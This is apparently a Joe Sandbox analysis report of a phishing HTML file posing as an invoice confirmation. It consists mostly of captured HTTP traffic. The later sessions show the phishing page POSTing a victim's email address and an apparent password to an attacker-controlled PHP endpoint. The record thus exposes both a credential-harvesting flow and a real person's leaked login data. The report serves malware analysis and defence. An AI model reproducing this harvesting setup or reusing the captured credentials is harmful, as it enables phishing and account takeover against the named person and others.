2025-04-02 13:02:00 UTC	1369	IN	Data Raw: 74 75 72 6e 20 6f 3d 3d 3d 74 7d 29 2c 6e 3d 21 21 69 26 26 65 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6e 61 6d 65 3d 3d 3d 6f 26 26 65 2e 65 6e 61 62 6c 65 64 26 26 65 2e 6f 72 64 65 72 3c 69 2e 6f 72 64 65 72 7d 29 3b 69 66 28 21 6e 29 7b 76 61 72 20 72 3d 27 60 27 2b 74 2b 27 60 27 3b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 27 2b 6f 2b 27 60 27 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 73 20 72 65 71 75 69 72 65 64 20 62 79 20 27 2b 72 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 6e 20 6f 72 64 65 72 20 74 6f 20 77 6f 72 6b 2c 20 62 65 20 73 75 72 65 20 74 6f 20 69 6e 63 6c 75 64 65 20 69 74 20 62 65 66 6f 72 65 20 27 2b 72 2b 27 21 27 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 Data Ascii: turn o===t}),n=!!i&&e.some(function(e){return e.name===o&&e.enabled&&e.order<i.order});if(!n){var r='`'+t+'`';console.warn('`'+o+'`'+' modifier is required by '+r+' modifier in order to work, be sure to include it before '+r+'!')}return n}function K(e){re
2025-04-02 13:02:00 UTC	1369	IN	Data Raw: 74 75 72 6e 27 27 3d 3d 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 26 26 2d 31 21 3d 3d 5b 27 2b 27 2c 27 2d 27 5d 2e 69 6e 64 65 78 4f 66 28 74 29 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3d 74 2c 70 3d 21 30 2c 65 29 3a 70 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 2b 3d 74 2c 70 3d 21 31 2c 65 29 3a 65 2e 63 6f 6e 63 61 74 28 74 29 7d 2c 5b 5d 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 56 28 65 2c 6e 2c 74 2c 6f 29 7d 29 7d 29 2c 61 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 69 29 7b 55 28 6f 29 26 26 28 6e 5b 74 5d 2b 3d 6f 2a 28 27 2d 27 3d 3d 3d 65 5b 69 2d 31 5d 3f 2d 31 3a 31 29 29 7d 29 7d 29 2c 6e 7d 66 75 6e 63 74 69 6f Data Ascii: turn''===e[e.length-1]&&-1!==['+','-'].indexOf(t)?(e[e.length-1]=t,p=!0,e):p?(e[e.length-1]+=t,p=!1,e):e.concat(t)},[]).map(function(e){return V(e,n,t,o)})}),a.forEach(function(e,t){e.forEach(function(o,i){U(o)&&(n[t]+=o*('-'===e[i-1]?-1:1))})}),n}functio
2025-04-02 13:02:00 UTC	1369	IN	Data Raw: 74 75 72 6e 20 6f 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6f 29 2c 69 26 26 65 28 74 2c 69 29 2c 74 7d 7d 28 29 2c 70 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6f 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6f 2c 65 7d 2c 73 65 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 3d 61 72 67 75 6d 65 6e 74 73 5b Data Ascii: turn o&&e(t.prototype,o),i&&e(t,i),t}}(),pe=function(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurable:!0,writable:!0}):e[t]=o,e},se=Object.assign\|\|function(e){for(var t,o=1;o<arguments.length;o++)for(var i in t=arguments[

Timestamp	Bytes transferred	Direction	Data
2025-04-02 13:02:01 UTC	638	OUT	GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1 Host: maxcdn.bootstrapcdn.com Connection: keep-alive Origin: https://7b6fzcwcqmmd8xoz5.kaisargift.com:8443 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://7b6fzcwcqmmd8xoz5.kaisargift.com:8443/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-04-02 13:02:01 UTC	954	IN	HTTP/1.1 200 OK Date: Wed, 02 Apr 2025 13:02:01 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close CDN-PullZone: 252412 CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74 CDN-RequestCountryCode: US Vary: Accept-Encoding Access-Control-Allow-Origin: * Cache-Control: public, max-age=31919000 ETag: W/"14d449eb8876fa55e1ef3c2cc52b0c17" Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT CDN-ProxyVer: 1.06 CDN-RequestPullSuccess: True CDN-RequestPullCode: 200 CDN-CachedAt: 12/04/2024 01:55:10 CDN-EdgeStorageId: 1067 timing-allow-origin: * cross-origin-resource-policy: cross-origin X-Content-Type-Options: nosniff CDN-RequestId: 3ffb440a347542da8ef97dcbd3647fae CDN-Cache: HIT CDN-Status: 200 CDN-RequestTime: 0 CF-Cache-Status: MISS Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Server: cloudflare CF-RAY: 92a084aa0f7c19cf-EWR alt-svc: h3=":443"; ma=86400
2025-04-02 13:02:01 UTC	415	IN	Data Raw: 37 62 66 39 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 Data Ascii: 7bf9/! Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t
2025-04-02 13:02:01 UTC	1369	IN	Data Raw: 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c Data Ascii: s","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable\|\|!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,
2025-04-02 13:02:01 UTC	1369	IN	Data Raw: 74 28 6e 29 2e 74 72 69 67 67 65 72 28 65 2e 65 6e 64 29 7d 2c 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 65 29 7d 2c 69 73 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 74 5b 30 5d 7c 7c 74 29 2e 6e 6f 64 65 54 79 70 65 7d 2c 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 6e 29 69 66 28 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 73 29 29 7b 76 61 72 20 72 3d 6e 5b 73 5d 2c 6f 3d 65 5b 73 5d 2c 61 3d 6f 26 26 69 2e 69 73 45 6c 65 6d 65 6e 74 28 6f 29 3f 22 65 6c Data Ascii: t(n).trigger(e.end)},supportsTransitionEnd:function(){return Boolean(e)},isElement:function(t){return(t[0]\|\|t).nodeType},typeCheckConfig:function(t,e,n){for(var s in n)if(Object.prototype.hasOwnProperty.call(n,s)){var r=n[s],o=e[s],a=o&&i.isElement(o)?"el
2025-04-02 13:02:01 UTC	1369	IN	Data Raw: 2e 43 4c 4f 53 45 29 3b 72 65 74 75 72 6e 20 6f 28 74 29 2e 74 72 69 67 67 65 72 28 65 29 2c 65 7d 2c 65 2e 5f 72 65 6d 6f 76 65 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 6f 28 74 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 5f 29 2c 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 6f 28 74 29 2e 68 61 73 43 6c 61 73 73 28 64 29 3f 6f 28 74 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74 2c 6e 29 7d 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 31 35 30 29 3a 74 68 69 73 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 Data Ascii: .CLOSE);return o(t).trigger(e),e},e._removeElement=function(t){var e=this;o(t).removeClass(_),P.supportsTransitionEnd()&&o(t).hasClass(d)?o(t).one(P.TRANSITION_END,function(n){return e._destroyElement(t,n)}).emulateTransitionEnd(150):this._destroyElement(
2025-04-02 13:02:01 UTC	1369	IN	Data Raw: 43 6c 61 73 73 28 43 29 7d 69 66 28 74 29 7b 69 66 28 69 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 69 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 29 72 65 74 75 72 6e 3b 69 2e 63 68 65 63 6b 65 64 3d 21 70 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 43 29 2c 70 28 69 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 7d 69 2e 66 6f 63 75 73 28 29 2c 65 3d 21 31 7d 7d 65 26 26 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 73 65 74 41 74 74 72 69 62 75 74 Data Ascii: Class(C)}if(t){if(i.hasAttribute("disabled")\|\|n.hasAttribute("disabled")\|\|i.classList.contains("disabled")\|\|n.classList.contains("disabled"))return;i.checked=!p(this._element).hasClass(C),p(i).trigger("change")}i.focus(),e=!1}}e&&this._element.setAttribut
2025-04-02 13:02:01 UTC	1369	IN	Data Raw: 69 2c 4d 4f 55 53 45 4c 45 41 56 45 3a 22 6d 6f 75 73 65 6c 65 61 76 65 22 2b 69 2c 54 4f 55 43 48 45 4e 44 3a 22 74 6f 75 63 68 65 6e 64 22 2b 69 2c 4c 4f 41 44 5f 44 41 54 41 5f 41 50 49 3a 22 6c 6f 61 64 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 5f 3d 22 63 61 72 6f 75 73 65 6c 22 2c 67 3d 22 61 63 74 69 76 65 22 2c 70 3d 22 73 6c 69 64 65 22 2c 6d 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 72 69 67 68 74 22 2c 76 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6c 65 66 74 22 2c 45 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6e 65 78 74 22 2c 54 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 70 72 65 76 22 2c 79 3d 7b 41 43 Data Ascii: i,MOUSELEAVE:"mouseleave"+i,TOUCHEND:"touchend"+i,LOAD_DATA_API:"load"+i+".data-api",CLICK_DATA_API:"click"+i+".data-api"},_="carousel",g="active",p="slide",m="carousel-item-right",v="carousel-item-left",E="carousel-item-next",T="carousel-item-prev",y={AC
2025-04-02 13:02:01 UTC	1369	IN	Data Raw: 65 72 76 61 6c 3d 6e 75 6c 6c 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 26 26 21 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 26 26 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 28 64 6f 63 75 6d 65 6e 74 2e 76 69 73 69 62 69 6c 69 74 79 53 74 61 74 65 3f 74 68 69 73 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3a 74 68 69 73 2e 6e 65 78 74 29 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 29 29 7d 2c 43 2e 74 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3d 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 66 69 6e 64 28 79 2e 41 43 54 49 56 45 5f 49 54 Data Ascii: erval=null),this._config.interval&&!this._isPaused&&(this._interval=setInterval((document.visibilityState?this.nextWhenVisible:this.next).bind(this),this._config.interval))},C.to=function(e){var n=this;this._activeElement=t(this._element).find(y.ACTIVE_IT
2025-04-02 13:02:01 UTC	1369	IN	Data Raw: 74 61 72 65 61 2f 69 2e 74 65 73 74 28 74 2e 74 61 72 67 65 74 2e 74 61 67 4e 61 6d 65 29 29 73 77 69 74 63 68 28 74 2e 77 68 69 63 68 29 7b 63 61 73 65 20 33 37 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 70 72 65 76 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 39 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 6e 65 78 74 28 29 7d 7d 2c 43 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 74 65 6d 73 3d 74 2e 6d 61 6b 65 41 72 72 61 79 28 74 28 65 29 2e 70 61 72 65 6e 74 28 29 2e 66 69 6e 64 28 79 2e 49 54 45 4d 29 29 2c 74 68 69 73 2e 5f 69 74 65 6d 73 2e 69 6e 64 65 78 4f 66 28 65 29 7d 2c 43 2e 5f 67 65 74 49 74 65 6d 42 Data Ascii: tarea/i.test(t.target.tagName))switch(t.which){case 37:t.preventDefault(),this.prev();break;case 39:t.preventDefault(),this.next()}},C._getItemIndex=function(e){return this._items=t.makeArray(t(e).parent().find(y.ITEM)),this._items.indexOf(e)},C._getItemB
2025-04-02 13:02:01 UTC	1369	IN	Data Raw: 6c 61 74 65 64 54 61 72 67 65 74 3a 63 2c 64 69 72 65 63 74 69 6f 6e 3a 72 2c 66 72 6f 6d 3a 6c 2c 74 6f 3a 5f 7d 29 3b 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 70 29 3f 28 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 73 29 2c 50 2e 72 65 66 6c 6f 77 28 63 29 2c 74 28 61 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 61 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 63 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 69 2b 22 20 22 2b 73 29 2e 61 64 64 43 6c 61 73 73 28 67 29 2c 74 28 61 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 67 2b 22 Data Ascii: latedTarget:c,direction:r,from:l,to:_});P.supportsTransitionEnd()&&t(this._element).hasClass(p)?(t(c).addClass(s),P.reflow(c),t(a).addClass(i),t(c).addClass(i),t(a).one(P.TRANSITION_END,function(){t(c).removeClass(i+" "+s).addClass(g),t(a).removeClass(g+"
2025-04-02 13:02:01 UTC	1369	IN	Data Raw: 63 74 69 6f 6e 28 29 7b 74 28 79 2e 44 41 54 41 5f 52 49 44 45 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 28 74 68 69 73 29 3b 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 65 2c 65 2e 64 61 74 61 28 29 29 7d 29 7d 29 2c 74 2e 66 6e 5b 65 5d 3d 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 74 2e 66 6e 5b 65 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 43 2c 74 2e 66 6e 5b 65 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 66 6e 5b 65 5d 3d 6f 2c 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 43 7d 28 65 29 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 63 6f 6c 6c 61 70 73 65 22 2c 6e 3d 22 62 73 2e 63 6f 6c Data Ascii: ction(){t(y.DATA_RIDE).each(function(){var e=t(this);C._jQueryInterface.call(e,e.data())})}),t.fn[e]=C._jQueryInterface,t.fn[e].Constructor=C,t.fn[e].noConflict=function(){return t.fn[e]=o,C._jQueryInterface},C}(e),H=function(t){var e="collapse",n="bs.col

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Invoice Confirmation Subscription_2EZHMA9.htm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 80

Chrome Cache Entry: 81

Chrome Cache Entry: 82

Chrome Cache Entry: 83

Chrome Cache Entry: 84

Chrome Cache Entry: 85

Chrome Cache Entry: 86

Chrome Cache Entry: 87

Chrome Cache Entry: 88

Chrome Cache Entry: 89

Chrome Cache Entry: 90

Chrome Cache Entry: 91

Chrome Cache Entry: 92

Chrome Cache Entry: 93

Chrome Cache Entry: 94

Chrome Cache Entry: 95

Chrome Cache Entry: 96

Chrome Cache Entry: 97

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Windows Analysis Report
Invoice Confirmation Subscription_2EZHMA9.htm

Timestamp	Bytes transferred	Direction	Data
2025-04-02 13:02:15 UTC	746	OUT	POST /app/godag.php HTTP/1.1 Host: erfectries.jamesolflt.bond Connection: keep-alive Content-Length: 66 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: https://7b6fzcwcqmmd8xoz5.kaisargift.com:8443 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://7b6fzcwcqmmd8xoz5.kaisargift.com:8443/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-04-02 13:02:15 UTC	66	OUT	Data Raw: 69 73 61 64 6f 73 61 3d 70 61 75 6c 2e 6e 65 66 66 25 34 30 67 65 6e 65 78 73 65 72 76 69 63 65 73 2e 63 6f 6d 26 67 74 61 67 6f 6c 61 73 3d 2e 73 65 25 32 36 41 33 4b 32 41 76 6b 21 75 6c 25 37 44 Data Ascii: isadosa=paul.neff%40genexservices.com&gtagolas=.se%26A3K2Avk!ul%7D
2025-04-02 13:02:16 UTC	1135	IN	HTTP/1.1 200 OK Date: Wed, 02 Apr 2025 13:02:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.4.33 Set-Cookie: PHPSESSID=hqh1e1jts9ub0lfeb3b895snb9; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, OPTIONS Access-Control-Allow-Headers: Content-Type cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nwX6rXy8g2aHzgIihpMNl39eTLHD4wRK58460oXl95udRA%2Ft%2FVawFZYjaorWvgVbzKaYlokZ6Z9wvnj5%2BPwXD0t6rpmLZv%2B6Jz%2Bks%2F%2BvrIa%2FcvEdPZlzeoEVa5zYwEn4TMoOJYwLkcFWZbi0nQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 92a085034c4643a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=102660&min_rtt=102563&rtt_var=21796&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1406&delivery_rate=36195&cwnd=232&unsent_bytes=0&cid=5396132658574ddb&ts=843&x=0"
2025-04-02 13:02:16 UTC	12	IN	Data Raw: 37 0d 0a 53 75 63 63 65 73 73 0d 0a Data Ascii: 7Success
2025-04-02 13:02:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-04-02 13:02:16 UTC	403	OUT	GET /app/godag.php HTTP/1.1 Host: erfectries.jamesolflt.bond Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-04-02 13:02:16 UTC	564	IN	HTTP/1.1 200 OK Date: Wed, 02 Apr 2025 13:02:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Server: cloudflare X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, OPTIONS Access-Control-Allow-Headers: Content-Type Cf-Cache-Status: DYNAMIC Set-Cookie: PHPSESSID=2ku3e3aufn4jfmga3rcg7k98ut; Path=/ CF-RAY: 92a0850abdc4ed71-EWR alt-svc: h3=":443"; ma=86400
2025-04-02 13:02:16 UTC	25	IN	Data Raw: 31 33 0d 0a 49 6e 76 61 6c 69 64 20 63 72 65 64 65 6e 74 69 61 6c 73 0d 0a Data Ascii: 13Invalid credentials
2025-04-02 13:02:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-04-02 13:02:27 UTC	746	OUT	POST /app/godag.php HTTP/1.1 Host: erfectries.jamesolflt.bond Connection: keep-alive Content-Length: 47 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: https://7b6fzcwcqmmd8xoz5.kaisargift.com:8443 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://7b6fzcwcqmmd8xoz5.kaisargift.com:8443/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-04-02 13:02:27 UTC	47	OUT	Data Raw: 69 73 61 64 6f 73 61 3d 70 61 75 6c 2e 6e 65 66 66 25 34 30 67 65 6e 65 78 73 65 72 76 69 63 65 73 2e 63 6f 6d 26 67 74 61 67 6f 6c 61 73 3d Data Ascii: isadosa=paul.neff%40genexservices.com&gtagolas=
